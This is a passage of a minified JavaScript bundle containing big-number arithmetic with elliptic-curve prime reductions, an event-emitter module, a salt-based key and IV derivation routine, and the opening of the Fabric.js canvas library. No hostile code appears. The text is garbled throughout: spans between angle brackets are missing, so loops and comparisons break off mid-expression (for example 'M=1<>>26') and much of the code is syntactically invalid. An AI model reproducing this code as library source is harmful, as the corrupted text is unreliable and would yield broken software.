J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(M.isOdd()||P.isOdd())&&(M.iadd(h),P.isub(R)),M.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(v.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(v.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(v)>=0?(f.isub(v),M.isub(G),P.isub(X)):(v.isub(f),G.isub(M),X.isub(P))}return{a:G,b:X,gcd:v.iushln(L)}},I.prototype._invmp=function(l){Q(0===l.negative),Q(!l.isZero());var J,f=this,v=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var M=new I(1),P=new I(0),G=v.clone();f.cmpn(1)>0&&v.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)M.isOdd()&&M.iadd(G),M.iushrn(1);for(var h=0,R=1;0==(v.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(v.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(v)>=0?(f.isub(v),M.isub(P)):(v.isub(f),P.isub(M))}return(J=0===f.cmpn(1)?M:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),v=l.clone();f.negative=0,v.negative=0;for(var M=0;f.isEven()&&v.isEven();M++)f.iushrn(1),v.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;v.isEven();)v.iushrn(1);var P=f.cmp(v);if(P<0){var G=f;f=v,v=G}else if(0===P||0===v.cmpn(1))break;f.isub(v)}return v.iushln(M)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){Q("number"==typeof l);var f=l%26,v=(l-f)/26,M=1<>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var v,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)v=1;else{f&&(l=-l),Q(l<=67108863,"Number is too big");var M=0|this.words[0];v=M===l?0:Ml.length)return 1;if(this.length=0;v--){var M=0|this.words[v],P=0|l.words[v];if(M!==P){MP&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return Q(!this.red,"Already a number in reduction context"),Q(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return Q(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return Q(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return Q(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return Q(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return Q(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return Q(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return Q(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return Q(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return Q(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return Q(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return Q(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return Q(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return Q(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return Q(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function B(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){B.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){B.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){B.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){B.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else Q(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}B.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},B.prototype.ireduce=function(l){var v,f=l;do{this.split(f,this.tmp),v=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(v>this.n);var M=v0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},B.prototype.split=function(l,f){l.iushrn(this.n,0,f)},B.prototype.imulK=function(l){return l.imul(this.k)},ae(K,B),K.prototype.split=function(l,f){for(var v=4194303,M=Math.min(l.length,9),P=0;P>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,v=0;v>>=26,l.words[v]=P,f=M}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){Q(0===l.negative,"red works only with positives"),Q(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){Q(0==(l.negative|f.negative),"red works only with positives"),Q(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var v=l.add(f);return v.cmp(this.m)>=0&&v.isub(this.m),v._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var v=l.iadd(f);return v.cmp(this.m)>=0&&v.isub(this.m),v},le.prototype.sub=function(l,f){this._verify2(l,f);var v=l.sub(f);return v.cmpn(0)<0&&v.iadd(this.m),v._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var v=l.isub(f);return v.cmpn(0)<0&&v.iadd(this.m),v},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if(Q(f%2==1),3===f){var v=this.m.add(new I(1)).iushrn(2);return this.pow(l,v)}for(var M=this.m.subn(1),P=0;!M.isZero()&&0===M.andln(1);)P++,M.iushrn(1);Q(!M.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,M),J=this.pow(l,M.addn(1).iushrn(1)),Z=this.pow(l,M),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();Q(Ae=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==M[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,M[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var v=l.imul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var v=l.mul(f),M=v.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=v.isub(M).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},8227:Pe=>{"use strict";var ie,we="object"==typeof Reflect?Reflect:null,de=we&&"function"==typeof we.apply?we.apply:function(B,K,ee){return Function.prototype.apply.call(B,K,ee)};ie=we&&"function"==typeof we.ownKeys?we.ownKeys:Object.getOwnPropertySymbols?function(B){return Object.getOwnPropertyNames(B).concat(Object.getOwnPropertySymbols(B))}:function(B){return Object.getOwnPropertyNames(B)};var Q=Number.isNaN||function(B){return B!=B};function ae(){ae.init.call(this)}Pe.exports=ae,Pe.exports.once=function w(O,B){return new Promise(function(K,ee){function se(le){O.removeListener(B,ve),ee(le)}function ve(){"function"==typeof O.removeListener&&O.removeListener("error",se),K([].slice.call(arguments))}S(O,B,ve,{once:!0}),"error"!==B&&function x(O,B,K){"function"==typeof O.on&&S(O,"error",B,K)}(O,se,{once:!0})})},ae.EventEmitter=ae,ae.prototype._events=void 0,ae.prototype._eventsCount=0,ae.prototype._maxListeners=void 0;var I=10;function $(O){if("function"!=typeof O)throw new TypeError('The "listener" argument must be of type Function. Received type '+typeof O)}function U(O){return void 0===O._maxListeners?ae.defaultMaxListeners:O._maxListeners}function E(O,B,K,ee){var se,ve,le;if($(K),void 0===(ve=O._events)?(ve=O._events=Object.create(null),O._eventsCount=0):(void 0!==ve.newListener&&(O.emit("newListener",B,K.listener?K.listener:K),ve=O._events),le=ve[B]),void 0===le)le=ve[B]=K,++O._eventsCount;else if("function"==typeof le?le=ve[B]=ee?[K,le]:[le,K]:ee?le.unshift(K):le.push(K),(se=U(O))>0&&le.length>se&&!le.warned){le.warned=!0;var ye=new Error("Possible EventEmitter memory leak detected. "+le.length+" "+String(B)+" listeners added. Use emitter.setMaxListeners() to increase limit");ye.name="MaxListenersExceededWarning",ye.emitter=O,ye.type=B,ye.count=le.length,function j(O){console&&console.warn&&console.warn(O)}(ye)}return O}function C(){if(!this.fired)return this.target.removeListener(this.type,this.wrapFn),this.fired=!0,0===arguments.length?this.listener.call(this.target):this.listener.apply(this.target,arguments)}function b(O,B,K){var ee={fired:!1,wrapFn:void 0,target:O,type:B,listener:K},se=C.bind(ee);return se.listener=K,ee.wrapFn=se,se}function _(O,B,K){var ee=O._events;if(void 0===ee)return[];var se=ee[B];return void 0===se?[]:"function"==typeof se?K?[se.listener||se]:[se]:K?function D(O){for(var B=new Array(O.length),K=0;K0&&(le=K[0]),le instanceof Error)throw le;var ye=new Error("Unhandled error."+(le?" ("+le.message+")":""));throw ye.context=le,ye}var z=ve[B];if(void 0===z)return!1;if("function"==typeof z)de(z,this,K);else{var l=z.length,f=A(z,l);for(ee=0;ee=0;le--)if(ee[le]===K||ee[le].listener===K){ye=ee[le].listener,ve=le;break}if(ve<0)return this;0===ve?ee.shift():function p(O,B){for(;B+1=0;se--)this.removeListener(B,K[se]);return this},ae.prototype.listeners=function(B){return _(this,B,!0)},ae.prototype.rawListeners=function(B){return _(this,B,!1)},ae.listenerCount=function(O,B){return"function"==typeof O.listenerCount?O.listenerCount(B):y.call(O,B)},ae.prototype.listenerCount=y,ae.prototype.eventNames=function(){return this._eventsCount>0?ie(this._events):[]}},1851:(Pe,we,de)=>{var ie=de(265).Buffer,j=de(807);Pe.exports=function Q(ae,I,$,U){if(ie.isBuffer(ae)||(ae=ie.from(ae,"binary")),I&&(ie.isBuffer(I)||(I=ie.from(I,"binary")),8!==I.length))throw new RangeError("salt should be Buffer with 8 byte length");for(var E=$/8,C=ie.alloc(E),b=ie.alloc(U||0),_=ie.alloc(0);E>0||U>0;){var y=new j;y.update(_),y.update(ae),I&&y.update(I),_=y.digest();var A=0;if(E>0){var p=C.length-E;A=Math.min(E,_.length),_.copy(C,p,0,A),E-=A}if(A<_.length&&U>0){var D=b.length-U,w=Math.min(U,_.length-A);_.copy(b,D,A,A+w),U-=w}}return _.fill(0),{key:C,iv:b}}},4968:(Pe,we,de)=>{var E,C,b,_,y,A,ie=de(5449).Buffer,j=j||{version:"5.2.4"};if(we.fabric=j,"undefined"!=typeof document&&"undefined"!=typeof window)j.document=document instanceof("undefined"!=typeof HTMLDocument?HTMLDocument:Document)?document:document.implementation.createHTMLDocument(""),j.window=window;else{var ae=new(de(4960).JSDOM)(decodeURIComponent("%3C!DOCTYPE%20html%3E%3Chtml%3E%3Chead%3E%3C%2Fhead%3E%3Cbody%3E%3C%2Fbody%3E%3C%2Fhtml%3E"),{features:{FetchExternalResources:["img"]},resources:"usable"}).window;j.document=ae.document,j.jsdomImplForWrapper=de(6759).implForWrapper,j.nodeCanvas=de(6272).Canvas,j.window=ae,DOMParser=j.window.DOMParser}function $(E,C){var b=E.canvas,_=C.targetCanvas,y=_.getContext("2d");y.translate(0,_.height),y.scale(1,-1),y.drawImage(b,0,b.height-_.height,_.width,_.height,0,0,_.width,_.height)}function U(E,C){var _=C.targetCanvas.getContext("2d"),y=C.destinationWidth,A=C.destinationHeight,p=y*A*4,D=new Uint8Array(this.imageBuffer,0,p),w=new Uint8ClampedArray(this.imageBuffer,0,p);E.readPixels(0,0,y,A,E.RGBA,E.UNSIGNED_BYTE,D);var x=new ImageData(w,y,A);_.putImageData(x,0,0)}j.isTouchSupported="ontouchstart"in j.window||"ontouchstart"in j.document||j.window&&j.window.navigator&&j.window.navigator.maxTouchPoints>0,j.isLikelyNode=void 0!==ie&&"undefined"==typeof window,j.SHARED_ATTRIBUTES=["display","transform","fill","fill-opacity","fill-rule","opacity","stroke","stroke-dasharray","stroke-linecap","stroke-dashoffset","stroke-linejoin","stroke-miterlimit","stroke-opacity","stroke-width","id","paint-order","vector-effect","instantiated_by_use","clip-path"],j.DPI=96,j.reNum="(?:[-+]?(?:\\d+|\\d*\\.\\d+)(?:[eE][-+]?\\d+)?)",j.commaWsp="(?:\\s+,?\\s*|,\\s*)",j.rePathCommand=/([-+]?((\d+\.\d+)|((\d+)|(\.\d+)))(?:[eE][-+]?\d+)?)/gi,j.reNonWord=/[ \n\.,;!\?\-]/,j.fontPaths={},j.iMatrix=[1,0,0,1,0,0],j.svgNS="http://www.w3.org/2000/svg",j.perfLimitSizeTotal=2097152,j.maxCacheSideLimit=4096,j.minCacheSideLimit=256,j.charWidthsCache={},j.textureSize=2048,j.disableStyleCopyPaste=!1,j.enableGLFiltering=!0,j.devicePixelRatio=j.window.devicePixelRatio||j.window.webkitDevicePixelRatio||j.window.mozDevicePixelRatio||1,j.browserShadowBlurConstant=1,j.arcToSegmentsCache={},j.boundsOfCurveCache={},j.cachesBoundsOfCurve=!0,j.forceGLPutImageData=!1,j.initFilterBackend=function(){return j.enableGLFiltering&&j.isWebglSupported&&j.isWebglSupported(j.textureSize)?(console.log("max texture size: "+j.maxTextureSize),new j.WebglFilterBackend({tileSize:j.textureSize})):j.Canvas2dFilterBackend?new j.Canvas2dFilterBackend:void 0},"undefined"!=typeof document&&"undefined"!=typeof window&&(window.fabric=j),function(){function E(p,D){if(this.__eventListeners[p]){var w=this.__eventListeners[p];D?w[w.indexOf(D)]=!1:j.util.array.fill(w,!1)}}function b(p,D){var w=function(){D.apply(this,arguments),this.off(p,w)}.bind(this);this.on(p,w)}j.Observable={fire:function A(p,D){if(!this.__eventListeners)return this;var w=this.__eventListeners[p];if(!w)return this;for(var x=0,S=w.length;x-1||!!C&&this._objects.some(function(b){return"function"==typeof b.contains&&b.contains(E,!0)})},complexity:function(){return this._objects.reduce(function(E,C){return E+(C.complexity?C.complexity():0)},0)}},j.CommonMethods={_setOptions:function(E){for(var C in E)this.set(C,E[C])},_initGradient:function(E,C){E&&E.colorStops&&!(E instanceof j.Gradient)&&this.set(C,new j.Gradient(E))},_initPattern:function(E,C,b){!E||!E.source||E instanceof j.Pattern?b&&b():this.set(C,new j.Pattern(E,b))},_setObject:function(E){for(var C in E)this._set(C,E[C])},set:function(E,C){return"object"==typeof E?this._setObject(E):this._set(E,C),this},_set:function(E,C){this[E]=C},toggle:function(E){var C=this.get(E);return"boolean"==typeof C&&this.set(E,!C),this},get:function(E){return this[E]}},E=we,C=Math.sqrt,b=Math.atan2,_=Math.pow,y=Math.PI/180,A=Math.PI/2,j.util={cos:function(p){if(0===p)return 1;switch(p<0&&(p=-p),p/A){case 1:case 3:return 0;case 2:return-1}return Math.cos(p)},sin:function(p){if(0===p)return 0;var w=1;switch(p<0&&(w=-1),p/A){case 1:return w;case 2:return 0;case 3:return-w}return Math.sin(p)},removeFromArray:function(p,D){var w=p.indexOf(D);return-1!==w&&p.splice(w,1),p},getRandomInt:function(p,D){return Math.floor(Math.random()*(D-p+1))+p},degreesToRadians:function(p){return p*y},radiansToDegrees:function(p){return p/y},rotatePoint:function(p,D,w){var x=new j.Point(p.x-D.x,p.y-D.y),S=j.util.rotateVector(x,w);return new j.Point(S.x,S.y).addEquals(D)},rotateVector:function(p,D){var w=j.util.sin(D),x=j.util.cos(D);return{x:p.x*x-p.y*w,y:p.x*w+p.y*x}},createVector:function(p,D){return new j.Point(D.x-p.x,D.y-p.y)},calcAngleBetweenVectors:function(p,D){return Math.acos((p.x*D.x+p.y*D.y)/(Math.hypot(p.x,p.y)*Math.hypot(D.x,D.y)))},getHatVector:function(p){return new j.Point(p.x,p.y).multiply(1/Math.hypot(p.x,p.y))},getBisector:function(p,D,w){var x=j.util.createVector(p,D),S=j.util.createVector(p,w),O=j.util.calcAngleBetweenVectors(x,S),B=j.util.calcAngleBetweenVectors(j.util.rotateVector(x,O),S);return{vector:j.util.getHatVector(j.util.rotateVector(x,O*(0===B?1:-1)/2)),angle:O}},projectStrokeOnPoints:function(p,D,w){var x=[],S=D.strokeWidth/2,O=D.strokeUniform?new j.Point(1/D.scaleX,1/D.scaleY):new j.Point(1,1),B=function(K){var ee=S/Math.hypot(K.x,K.y);return new j.Point(K.x*ee*O.x,K.y*ee*O.y)};return p.length<=1||p.forEach(function(K,ee){var ve,le,se=new j.Point(K.x,K.y);0===ee?(le=p[ee+1],ve=w?B(j.util.createVector(le,se)).addEquals(se):p[p.length-1]):ee===p.length-1?(ve=p[ee-1],le=w?B(j.util.createVector(ve,se)).addEquals(se):p[0]):(ve=p[ee-1],le=p[ee+1]);var f,v,ye=j.util.getBisector(se,ve,le),z=ye.vector;if("miter"===D.strokeLineJoin&&(f=-S/Math.sin(ye.angle/2),v=new j.Point(z.x*f*O.x,z.y*f*O.y),Math.hypot(v.x,v.y)/S<=D.strokeMiterLimit))return x.push(se.add(v)),void x.push(se.subtract(v));f=-S*Math.SQRT2,v=new j.Point(z.x*f*O.x,z.y*f*O.y),x.push(se.add(v)),x.push(se.subtract(v))}),x},transformPoint:function(p,D,w){return w?new j.Point(D[0]*p.x+D[2]*p.y,D[1]*p.x+D[3]*p.y):new j.Point(D[0]*p.x+D[2]*p.y+D[4],D[1]*p.x+D[3]*p.y+D[5])},makeBoundingBoxFromPoints:function(p,D){if(D)for(var w=0;w0&&(D>x?D-=x:D=0,w>x?w-=x:w=0);var O,S=!0,K=p.getImageData(D,w,2*x||1,2*x||1),ee=K.data.length;for(O=3;O=ue?Ie-ue:2*Math.PI-(ue-Ie)}function D(h,R,J){for(var Be=function y(h,R,J,Z,ue,Ie,Ae){var Ue=Math.PI,Xe=Ae*Ue/180,He=j.util.sin(Xe),Be=j.util.cos(Xe),qe=0,De=0,Ve=-Be*h*.5-He*R*.5,ze=-Be*R*.5+He*h*.5,me=(J=Math.abs(J))*J,Ke=(Z=Math.abs(Z))*Z,rt=ze*ze,Ge=Ve*Ve,Qe=me*Ke-me*rt-Ke*Ge,ht=0;if(Qe<0){var mt=Math.sqrt(1-Qe/(me*Ke));J*=mt,Z*=mt}else ht=(ue===Ie?-1:1)*Math.sqrt(Qe/(me*rt+Ke*Ge));var lt=ht*J*ze/Z,ft=-ht*Z*Ve/J,xe=Be*lt-He*ft+.5*h,We=He*lt+Be*ft+.5*R,Je=A(1,0,(Ve-lt)/J,(ze-ft)/Z),Oe=A((Ve-lt)/J,(ze-ft)/Z,(-Ve-lt)/J,(-ze-ft)/Z);0===Ie&&Oe>0?Oe-=2*Ue:1===Ie&&Oe<0&&(Oe+=2*Ue);for(var Te=Math.ceil(Math.abs(Oe/Ue*2)),Le=[],$e=Oe/Te,st=8/3*Math.sin($e/4)*Math.sin($e/4)/Math.sin($e/2),xt=Je+$e,pt=0;ptmt)for(var ft=1,xe=me.length;ft2;for(He&&(Ue=h[2].xh[Z-2].x?1:ue.x===h[Z-2].x?0:-1,Xe=ue.y>h[Z-2].y?1:ue.y===h[Z-2].y?0:-1),J.push(["L",ue.x+Ue*R,ue.y+Xe*R]),J},j.util.getPathSegmentsInfo=M,j.util.getBoundsOfCurve=function p(h,R,J,Z,ue,Ie,Ae,Ue){var Xe;if(j.cachesBoundsOfCurve&&(Xe=E.call(arguments),j.boundsOfCurveCache[Xe]))return j.boundsOfCurveCache[Xe];var me,Ke,rt,Ge,Qe,ht,mt,lt,He=Math.sqrt,Be=Math.min,qe=Math.max,De=Math.abs,Ve=[],ze=[[],[]];Ke=6*h-12*J+6*ue,me=-3*h+9*J-9*ue+3*Ae,rt=3*J-3*h;for(var ft=0;ft<2;++ft)if(ft>0&&(Ke=6*R-12*Z+6*Ie,me=-3*R+9*Z-9*Ie+3*Ue,rt=3*Z-3*R),De(me)<1e-12){if(De(Ke)<1e-12)continue;0<(Ge=-rt/Ke)&&Ge<1&&Ve.push(Ge)}else!((mt=Ke*Ke-4*rt*me)<0)&&(0<(Qe=(-Ke+(lt=He(mt)))/(2*me))&&Qe<1&&Ve.push(Qe),0<(ht=(-Ke-lt)/(2*me))&&ht<1&&Ve.push(ht));for(var Te,Je=Ve.length,Oe=Je;Je--;)ze[0][Je]=(Te=1-(Ge=Ve[Je]))*Te*Te*h+3*Te*Te*Ge*J+3*Te*Ge*Ge*ue+Ge*Ge*Ge*Ae,ze[1][Je]=Te*Te*Te*R+3*Te*Te*Ge*Z+3*Te*Ge*Ge*Ie+Ge*Ge*Ge*Ue;ze[0][Oe]=h,ze[1][Oe]=R,ze[0][Oe+1]=Ae,ze[1][Oe+1]=Ue;var Le=[{x:Be.apply(null,ze[0]),y:Be.apply(null,ze[1])},{x:qe.apply(null,ze[0]),y:qe.apply(null,ze[1])}];return j.cachesBoundsOfCurve&&(j.boundsOfCurveCache[Xe]=Le),Le},j.util.getPointOnPath=function P(h,R,J){J||(J=M(h));for(var Z=0;R-J[Z].length>0&&Z1e-4;)Ae=ue(J),Be=J,(Ue=x(Ie.x,Ie.y,Ae.x,Ae.y))+Z>R?(J-=Xe,Xe/=2):(Ie=Ae,J+=Xe,Z+=Ue);return Ae.angle=He(Be),Ae}(ue,R)}},j.util.transformPath=function L(h,R,J){return J&&(R=j.util.multiplyTransformMatrices(R,[1,0,0,1,-J.x,-J.y])),h.map(function(Z){for(var ue=Z.slice(0),Ie={},Ae=1;Ae=x})}}}(),function(){function E(b,_,y){if(y)if(!j.isLikelyNode&&_ instanceof Element)b=_;else if(_ instanceof Array){b=[];for(var A=0,p=_.length;A57343)return A.charAt(p);if(55296<=D&&D<=56319){if(A.length<=p+1)throw"High surrogate without following low surrogate";var w=A.charCodeAt(p+1);if(56320>w||w>57343)throw"High surrogate without following low surrogate";return A.charAt(p)+A.charAt(p+1)}if(0===p)throw"Low surrogate without preceding high surrogate";var x=A.charCodeAt(p-1);if(55296>x||x>56319)throw"Low surrogate without preceding high surrogate";return!1}j.util.string={camelize:function E(A){return A.replace(/-+(.)?/g,function(p,D){return D?D.toUpperCase():""})},capitalize:function C(A,p){return A.charAt(0).toUpperCase()+(p?A.slice(1):A.slice(1).toLowerCase())},escapeXml:function b(A){return A.replace(/&/g,"&").replace(/"/g,""").replace(/'/g,"'").replace(//g,">")},graphemeSplit:function _(A){var D,p=0,w=[];for(p=0;p-1?function(O){return function(){var B=this.constructor.superclass;this.constructor.superclass=x;var K=w[O].apply(this,arguments);if(this.constructor.superclass=B,"initialize"!==O)return K}}(S):w[S],b&&(w.toString!==Object.prototype.toString&&(D.prototype.toString=w.toString),w.valueOf!==Object.prototype.valueOf&&(D.prototype.valueOf=w.valueOf))};function y(){}function A(D){for(var w=null,x=this;x.constructor.superclass;){var S=x.constructor.superclass.prototype[D];if(x[D]!==S){w=S;break}x=x.constructor.superclass.prototype}return w?arguments.length>1?w.apply(this,E.call(arguments,1)):w.call(this):console.log("tried to callSuper "+D+", method not found in prototype chain",this)}j.util.createClass=function p(){var D=null,w=E.call(arguments,0);function x(){this.initialize.apply(this,arguments)}"function"==typeof w[0]&&(D=w.shift()),x.superclass=D,x.subclasses=[],D&&(y.prototype=D.prototype,x.prototype=new y,D.subclasses.push(x));for(var S=0,O=w.length;S-1||"touch"===_.pointerType}}(),function(){var C=j.document.createElement("div"),y=/alpha\s*\(\s*opacity\s*=\s*([^\)]+)\)/,A=function(p){return p};"string"==typeof C.style.opacity?A=function(p,D){return p.style.opacity=D,p}:"string"==typeof C.style.filter&&(A=function(p,D){var w=p.style;return p.currentStyle&&!p.currentStyle.hasLayout&&(w.zoom=1),y.test(w.filter)?w.filter=w.filter.replace(y,D=D>=.9999?"":"alpha(opacity="+100*D+")"):w.filter+=" alpha(opacity="+100*D+")",p}),j.util.setStyle=function E(p,D){var w=p.style;if(!w)return p;if("string"==typeof D)return p.style.cssText+=";"+D,D.indexOf("opacity")>-1?A(p,D.match(/opacity:\s*(\d?\.?\d*)/)[1]):p;for(var x in D)"opacity"===x?A(p,D[x]):w.setProperty("float"===x||"cssFloat"===x?void 0===w.styleFloat?"cssFloat":"styleFloat":x,D[x]);return p}}(),function(){var b,x,K,ee,E=Array.prototype.slice,_=function(K){return E.call(K,0)};try{b=_(j.document.childNodes)instanceof Array}catch(K){}function y(K,ee){var se=j.document.createElement(K);for(var ve in ee)"class"===ve?se.className=ee[ve]:"for"===ve?se.htmlFor=ee[ve]:se.setAttribute(ve,ee[ve]);return se}function D(K){for(var ee=0,se=0,ve=j.document.documentElement,le=j.document.body||{scrollLeft:0,scrollTop:0};K&&(K.parentNode||K.host)&&((K=K.parentNode||K.host)===j.document?(ee=le.scrollLeft||ve.scrollLeft||0,se=le.scrollTop||ve.scrollTop||0):(ee+=K.scrollLeft||0,se+=K.scrollTop||0),1!==K.nodeType||"fixed"!==K.style.position););return{left:ee,top:se}}b||(_=function(K){for(var ee=new Array(K.length),se=K.length;se--;)ee[se]=K[se];return ee}),x=j.document.defaultView&&j.document.defaultView.getComputedStyle?function(K,ee){var se=j.document.defaultView.getComputedStyle(K,null);return se?se[ee]:void 0}:function(K,ee){var se=K.style[ee];return!se&&K.currentStyle&&(se=K.currentStyle[ee]),se},ee="userSelect"in(K=j.document.documentElement.style)?"userSelect":"MozUserSelect"in K?"MozUserSelect":"WebkitUserSelect"in K?"WebkitUserSelect":"KhtmlUserSelect"in K?"KhtmlUserSelect":"",j.util.makeElementUnselectable=function se(le){return void 0!==le.onselectstart&&(le.onselectstart=j.util.falseFunction),ee?le.style[ee]="none":"string"==typeof le.unselectable&&(le.unselectable="on"),le},j.util.makeElementSelectable=function ve(le){return void 0!==le.onselectstart&&(le.onselectstart=null),ee?le.style[ee]="":"string"==typeof le.unselectable&&(le.unselectable=""),le},j.util.setImageSmoothing=function 